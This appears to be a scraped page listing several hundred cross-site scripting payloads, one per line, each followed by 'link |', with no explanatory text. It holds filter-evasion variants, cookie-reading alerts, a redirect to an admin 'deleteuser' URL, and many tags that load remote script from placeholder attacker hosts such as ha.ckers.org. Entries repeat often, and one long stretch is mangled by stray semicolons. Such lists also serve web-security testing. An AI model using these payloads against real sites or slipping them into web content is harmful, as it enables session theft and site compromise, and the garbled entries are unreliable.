</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} |
link |
<a href="javascript:\u0061le%72t(1)"><button> |
link |
<div onmouseover='alert(1)'>DIV</div> |
link |
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> |
link |
<a href="jAvAsCrIpT:alert(1)">X</a> |
link |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> |
link |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> |
link |
<var onmouseover="prompt(1)">On Mouse Over</var> |
link |
<a href=javascript:alert(document.cookie)>Click Here</a> |
link |
<img src="/" =_=" title="onerror='prompt(1)'"> |
link |
<%<!--'%><script>alert(1);</script --> |
link |
<script src="data:text/javascript,alert(1)"></script> |
link |
<svg/onload=alert(1) |
link |
<input value=<><iframe/src=javascript:confirm(1) |
link |
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> |
link |
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> |
link |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/> |
link |
<math><a xlink:href="//jsfiddle.net/t846h/">click |
link |
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> |
link |
<svg contentScriptType=text/vbs><script>MsgBox+1 |
link |
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a |
link |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> |
link |
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F |
link |
<object data=javascript:\u0061le%72t(1)> |
link |
<script itworksinallbrowsers>/*<script* */alert(1)</script |
link |
<img src ?itworksonchrome?\/onerror = alert(1) |
link |
<svg><script>//
confirm(1);</script </svg> |
link |
<svg><script onlypossibleinopera:-)> alert(1) |
link |
<div/onmouseover='alert(1)'> style="x:"> |
link |
"><img src=x onerror=window.open('https://www.google.com/');> |
link |
<form><button formaction=javascript:alert(1)>CLICKME |
link |
<math><a xlink:href="//jsfiddle.net/t846h/">click |
link |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> |
link |
'';!--"<XSS>=&{()} |
link |
'>//\\,<'>">">"*" |
link |
'); alert('XSS |
link |
<script>alert(1);</script> |
link |
<script>alert('XSS');</script> |
link |
<IMG SRC=javascript:alert("XSS")> |
link |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> |
link |
<scr<script>ipt>alert('XSS');</scr</script>ipt> |
link |
<script>alert(String.fromCharCode(88,83,83))</script> |
link |
<img src=foo.png onerror=alert(/xssed/) /> |
link |
<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> |
link |
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> |
link |
<marquee><script>alert('XSS')</script></marquee> |
link |
<IMG SRC=\"jav	ascript:alert('XSS');\"> |
link |
<IMG SRC=\"jav
ascript:alert('XSS');\"> |
link |
<IMG SRC=\"jav
ascript:alert('XSS');\"> |
link |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> |
link |
"><script>alert(0)</script> |
link |
<script src=http://yoursite.com/your_files.js></script> |
link |
</textarea><script>alert(/xss/)</script> |
link |
<IMG LOWSRC=\"javascript:alert('XSS')\"> |
link |
<IMG DYNSRC=\"javascript:alert('XSS')\"> |
link |
<font style='color:expression(alert(document.cookie))'> |
link |
<script language="JavaScript">alert('XSS')</script> |
link |
<body onunload="javascript:alert('XSS');"> |
link |
<body onLoad="alert('XSS');" |
link |
[color=red' onmouseover="alert('xss')"]mouse over[/color] |
link |
"/></a></><img src=1.gif onerror=alert(1)> |
link |
window.alert("Bonjour !"); |
link |
<div style="x:expression((window.r==1)?'':eval('r=1; |
link |
alert(String.fromCharCode(88,83,83));'))"> |
link |
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> |
link |
"><script alert(String.fromCharCode(88,83,83))</script> |
link |
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> |
link |
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> |
link |
<script>var var = 1; alert(var)</script> |
link |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> |
link |
" onfocus=alert(document.domain) "> <" |
link |
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> |
link |
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS |
link |
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out |
link |
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out |
link |
<br size=\"&{alert('XSS')}\"> |
link |
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> |
link |
[color=red width=expression(alert(123))][color] |
link |
<BASE HREF="javascript:alert('XSS');//"> |
link |
Execute(MsgBox(chr(88)&chr(83)&chr(83)))< |
link |
"></iframe><script>alert(123)</script> |
link |
<body onLoad="while(true) alert('XSS');"> |
link |
'"></title><script>alert(1111)</script> |
link |
</textarea>'"><script>alert(document.cookie)</script> |
link |
'""><script language="JavaScript"> alert('X \nS \nS');</script> |
link |
</script></script><<<<script><>>>><<<script>alert(123)</script> |
link |
<html><noalert><noscript>(123)</noscript><script>(123)</script> |
link |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> |
link |
'></select><script>alert(123)</script> |
link |
'>"><script src = 'http://www.site.com/XSS.js'></script> |
link |
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script> |
link |
<SCRIPT>document.write("XSS");</SCRIPT> |
link |
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); |
link |
<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script> |
link |
<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body> |
link |
">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script> |
link |
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script> |
link |
src="http://www.site.com/XSS.js"></script> |
link |
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= |
link |
<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> |
link |
"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> |
link |
'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> |
link |
<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> |
link |
<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee> |
link |
"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee> |
link |
'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee> |
link |
<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee> |
link |
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=' |
link |
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=" |
link |
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\' |
link |
http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS?? |
link |
'); alert('xss'); var x=' |
link |
\\'); alert(\'xss\');var x=\' |
link |
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83)); |
link |
>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt> |
link |
</body> |
link |
</html> |
link |
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> |
link |
<BODY ONLOAD=alert("XSS")> |
link |
<BODY BACKGROUND="javascript:alert('XSS')"> |
link |
<IFRAME SRC=”http://hacker-site.com/xss.html”> |
link |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> |
link |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> |
link |
<TABLE BACKGROUND="javascript:alert('XSS')"> |
link |
<TD BACKGROUND="javascript:alert('XSS')"> |
link |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> |
link |
<DIV STYLE="width: expression(alert('XSS'));"> |
link |
<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"> |
link |
<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"> |
link |
'';!--"<XSS>=&{()} |
link |
<SCRIPT>alert('XSS')</SCRIPT> |
link |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> |
link |
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> |
link |
<BASE HREF="javascript:alert('XSS');//"> |
link |
<BGSOUND SRC="javascript:alert('XSS');"> |
link |
<BODY BACKGROUND="javascript:alert('XSS');"> |
link |
<BODY ONLOAD=alert('XSS')> |
link |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> |
link |
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> |
link |
<DIV STYLE="width: expression(alert('XSS'));"> |
link |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> |
link |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> |
link |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> |
link |
<IMG SRC="javascript:alert('XSS');"> |
link |
<IMG SRC=javascript:alert('XSS')> |
link |
<IMG DYNSRC="javascript:alert('XSS');"> |
link |
<IMG LOWSRC="javascript:alert('XSS');"> |
link |
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser |
link |
exp/*<XSS STYLE='no\xss:noxss("*//*"); |
link |
<IMG SRC='vbscript:msgbox("XSS")'> |
link |
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> |
link |
<IMG SRC="livescript:[code]"> |
link |
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE |
link |
<IMG SRC="mocha:[code]"> |
link |
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> |
link |
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> |
link |
<XSS STYLE="xss:expression(alert('XSS'))"> |
link |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> |
link |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> |
link |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> |
link |
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> |
link |
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> |
link |
<HTML xmlns:xss> |
link |
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> |
link |
<HTML><BODY> |
link |
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> |
link |
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> |
link |
<BR SIZE="&{alert('XSS')}"> |
link |
<IMG SRC=JaVaScRiPt:alert('XSS')> |
link |
<IMG SRC=javascript:alert(&quot;XSS&quot;)> |
link |
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> |
link |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> |
link |
</TITLE><SCRIPT>alert("XSS");</SCRIPT> |
link |
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> |
link |
<IMG SRC="jav	ascript:alert('XSS');"> |
link |
<IMG SRC="jav&#x09;ascript:alert('XSS');"> |
link |
<IMG SRC="jav&#x0A;ascript:alert('XSS');"> |
link |
<IMG SRC="jav&#x0D;ascript:alert('XSS');"> |
link |
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out |
link |
<IMG SRC=" &#14; javascript:alert('XSS');"> |
link |
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> |
link |
<SCRIPT SRC=http://ha.ckers.org/xss.js |
link |
<IMG SRC="javascript:alert('XSS')" |
link |
<IFRAME SRC=http://ha.ckers.org/scriptlet.html < |
link |
<<SCRIPT>alert("XSS");//<</SCRIPT> |
link |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> |
link |
<SCRIPT>a=/XSS/ |
link |
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT a=`>`SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<A HREF="http://66.102.7.147/">XSS</A> |
link |
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> |
link |
<A HREF="http://1113982867/">XSS</A> |
link |
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> |
link |
<A HREF="http://0102.0146.0007.00000223/">XSS</A> |
link |
<A HREF="h
tt	p://6&#09;6.000146.0x7.147/">XSS</A> |
link |
<A HREF="//www.google.com/">XSS</A> |
link |
<A HREF="//google">XSS</A> |
link |
<A HREF="http://ha.ckers.org@google">XSS</A> |
link |
<A HREF="http://google:ha.ckers.org">XSS</A> |
link |
<A HREF="http://google.com/">XSS</A> |
link |
<A HREF="http://www.google.com./">XSS</A> |
link |
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> |
link |
<script>document.vulnerable=true;</script> |
link |
<img SRC="jav ascript:document.vulnerable=true;"> |
link |
<img SRC="javascript:document.vulnerable=true;"> |
link |
<img SRC="  javascript:document.vulnerable=true;"> |
link |
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> |
link |
<<SCRIPT>document.vulnerable=true;//<</SCRIPT> |
link |
<script <B>document.vulnerable=true;</script> |
link |
<img SRC="javascript:document.vulnerable=true;" |
link |
<iframe src="javascript:document.vulnerable=true; < |
link |
<script>a=/XSS/\ndocument.vulnerable=true;</script> |
link |
\";document.vulnerable=true;;// |
link |
</title><SCRIPT>document.vulnerable=true;</script> |
link |
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> |
link |
<body BACKGROUND="javascript:document.vulnerable=true;"> |
link |
<body ONLOAD=document.vulnerable=true;> |
link |
<img DYNSRC="javascript:document.vulnerable=true;"> |
link |
<img LOWSRC="javascript:document.vulnerable=true;"> |
link |
<bgsound SRC="javascript:document.vulnerable=true;"> |
link |
<br SIZE="&{document.vulnerable=true}"> |
link |
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER> |
link |
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> |
link |
<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS |
link |
<img SRC='vbscript:document.vulnerable=true;'> |
link |
1script3document.vulnerable=true;1/script3 |
link |
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> |
link |
<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> |
link |
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe> |
link |
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> |
link |
<table BACKGROUND="javascript:document.vulnerable=true;"> |
link |
<table><TD BACKGROUND="javascript:document.vulnerable=true;"> |
link |
<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> |
link |
<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> |
link |
<div STYLE="width: expression(document.vulnerable=true);"> |
link |
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> |
link |
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> |
link |
<XSS STYLE="xss:expression(document.vulnerable=true)"> |
link |
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> |
link |
<style TYPE="text/javascript">document.vulnerable=true;</style> |
link |
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> |
link |
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> |
link |
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> |
link |
<base HREF="javascript:document.vulnerable=true;//"> |
link |
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> |
link |
<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> |
link |
<a href="javascript#document.vulnerable=true;"> |
link |
<div onmouseover="document.vulnerable=true;"> |
link |
<img src="javascript:document.vulnerable=true;"> |
link |
<img dynsrc="javascript:document.vulnerable=true;"> |
link |
<input type="image" dynsrc="javascript:document.vulnerable=true;"> |
link |
<bgsound src="javascript:document.vulnerable=true;"> |
link |
&<script>document.vulnerable=true;</script> |
link |
&{document.vulnerable=true;}; |
link |
<img src=&{document.vulnerable=true;};> |
link |
<link rel="stylesheet" href="javascript:document.vulnerable=true;"> |
link |
<iframe src="vbscript:document.vulnerable=true;"> |
link |
<img src="mocha:document.vulnerable=true;"> |
link |
<img src="livescript:document.vulnerable=true;"> |
link |
<a href="about:<script>document.vulnerable=true;</script>"> |
link |
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> |
link |
<body onload="document.vulnerable=true;"> |
link |
<div style="background-image: url(javascript:document.vulnerable=true;);"> |
link |
<div style="behaviour: url([link to code]);"> |
link |
<div style="binding: url([link to code]);"> |
link |
<div style="width: expression(document.vulnerable=true;);"> |
link |
<style type="text/javascript">document.vulnerable=true;</style> |
link |
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> |
link |
<style><!--</style><script>document.vulnerable=true;//--></script> |
link |
<<script>document.vulnerable=true;</script> |
link |
<![<!--]]<script>document.vulnerable=true;//--></script> |
link |
<!-- -- --><script>document.vulnerable=true;</script><!-- -- --> |
link |
<img src="blah"onmouseover="document.vulnerable=true;"> |
link |
<img src="blah>" onmouseover="document.vulnerable=true;"> |
link |
<xml src="javascript:document.vulnerable=true;"> |
link |
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> |
link |
<div datafld="b" dataformatas="html" datasrc="#X"></div> |
link |
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> |
link |
<style>@import'http://www.securitycompass.com/xss.css';</style> |
link |
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> |
link |
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> |
link |
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> |
link |
<script SRC="http://www.securitycompass.com/xss.jpg"></script> |
link |
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script> |
link |
<script =">" SRC="http://www.securitycompass.com/xss.js"></script> |
link |
<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> |
link |
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> |
link |
<script a=`>`SRC="http://www.securitycompass.com/xss.js"></script> |
link |
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> |
link |
<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> |
link |
<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] |
link |
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> |
link |
</script><script>alert(1)</script> |
link |
</br style=a:expression(alert())> |
link |
<scrscriptipt>alert(1)</scrscriptipt> |
link |
<br size=\"&{alert('XSS')}\"> |
link |
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> |
link |
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> |
link |
<~/XSS STYLE=xss:expression(alert('XSS'))> |
link |
"><script>alert('XSS')</script> |
link |
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> |
link |
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> |
link |
XSS STYLE=xss:e/**/xpression(alert('XSS'))> |
link |
</XSS STYLE=xss:expression(alert('XSS'))> |
link |
';';;!--";<;XSS>;=&;{()} |
link |
<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>; |
link |
<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; |
link |
<;BASE HREF=";javascript:alert(';XSS';);//";>; |
link |
<;BGSOUND SRC=";javascript:alert(';XSS';);";>; |
link |
<;BODY BACKGROUND=";javascript:alert(';XSS';);";>; |
link |
<;BODY ONLOAD=alert(';XSS';)>; |
link |
<;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>; |
link |
<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>; |
link |
<;DIV STYLE=";width: expression(alert(';XSS';));";>; |
link |
<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>; |
link |
<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>; |
link |
<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>; |
link |
<;IMG SRC=";javascript:alert(';XSS';);";>; |
link |
<;IMG DYNSRC=";javascript:alert(';XSS';);";>; |
link |
<;IMG LOWSRC=";javascript:alert(';XSS';);";>; |
link |
<;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>; |
link |
Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser |
link |
exp/*<;XSS STYLE=';no\xss:noxss(";*//*";); |
link |
<;STYLE>;li {list-style-image: url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS |
link |
<;IMG SRC=';vbscript:msgbox(";XSS";)';>; |
link |
<;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>; |
link |
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE |
link |
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>; |
link |
<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>; |
link |
<;IMG SRC=";mocha:[code]";>; |
link |
<;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>; |
link |
<;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>; |
link |
<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>; |
link |
<;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>; |
link |
<;XSS STYLE=";xss:expression(alert(';XSS';))";>; |
link |
<;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>; |
link |
<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>; |
link |
<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>; |
link |
<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>; |
link |
<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>; |
link |
<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>; |
link |
<;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>; |
link |
<;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>; |
link |
<;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>; |
link |
<;HTML xmlns:xss>; |
link |
<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>; |
link |
<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>; |
link |
<;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>; |
link |
<;HTML>;<;BODY>; |
link |
<;!--[if gte IE 4]>; |
link |
<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>; |
link |
<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>; |
link |
<;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>; |
link |
<;? echo(';<;SCR)';; |
link |
<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>; |
link |
<;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>; |
link |
<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; |
link |
\";;alert(';XSS';);// |
link |
<;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>; |
link |
<;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>; |
link |
<;IMG SRC=";jav	ascript:alert(';XSS';);";>; |
link |
<;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>; |
link |
<;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>; |
link |
<;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>; |
link |
perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out |
link |
perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out |
link |
<;IMG SRC="; &;#14; javascript:alert(';XSS';);";>; |
link |
<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; |
link |
<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; |
link |
<;SCRIPT SRC=http://ha.ckers.org/xss.js |
link |
<;SCRIPT SRC=//ha.ckers.org/.j>; |
link |
<;IMG SRC=";javascript:alert(';XSS';)"; |
link |
<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; |
link |
<;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>; |
link |
<;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>; |
link |
<;SCRIPT>;a=/XSS/ |
link |
<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; |
link |
<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; |
link |
<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; |
link |
<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; |
link |
<;SCRIPT a=`>;`SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; |
link |
<;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; |
link |
<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; |
link |
<;A HREF=";http://66.102.7.147/";>;XSS<;/A>; |
link |
<;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>; |
link |
<;A HREF=";http://1113982867/";>;XSS<;/A>; |
link |
<;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>; |
link |
<;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>; |
link |
<;A HREF=";h
tt	p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>; |
link |
<;A HREF=";//www.google.com/";>;XSS<;/A>; |
link |
<;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>; |
link |
<;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>; |
link |
<;A HREF=";http://google.com/";>;XSS<;/A>; |
link |
<;A HREF=";http://www.google.com./";>;XSS<;/A>; |
link |
<;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>; |
link |
<;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>; |
link |
<script>document.vulnerable=true;</script> |
link |
<img SRC="jav ascript:document.vulnerable=true;"> |
link |
<img SRC="javascript:document.vulnerable=true;"> |
link |
<img SRC="  javascript:document.vulnerable=true;"> |
link |
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> |
link |
<<SCRIPT>document.vulnerable=true;//<</SCRIPT> |
link |
<script <B>document.vulnerable=true;</script> |
link |
<img SRC="javascript:document.vulnerable=true;" |
link |
<iframe src="javascript:document.vulnerable=true; < |
link |
<script>a=/XSS/\ndocument.vulnerable=true;</script> |
link |
\";document.vulnerable=true;;// |
link |
</title><SCRIPT>document.vulnerable=true;</script> |
link |
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> |
link |
<body BACKGROUND="javascript:document.vulnerable=true;"> |
link |
<body ONLOAD=document.vulnerable=true;> |
link |
<img DYNSRC="javascript:document.vulnerable=true;"> |
link |
<img LOWSRC="javascript:document.vulnerable=true;"> |
link |
<bgsound SRC="javascript:document.vulnerable=true;"> |
link |
<br SIZE="&{document.vulnerable=true}"> |
link |
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER> |
link |
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> |
link |
<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS |
link |
<img SRC='vbscript:document.vulnerable=true;'> |
link |
1script3document.vulnerable=true;1/script3 |
link |
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> |
link |
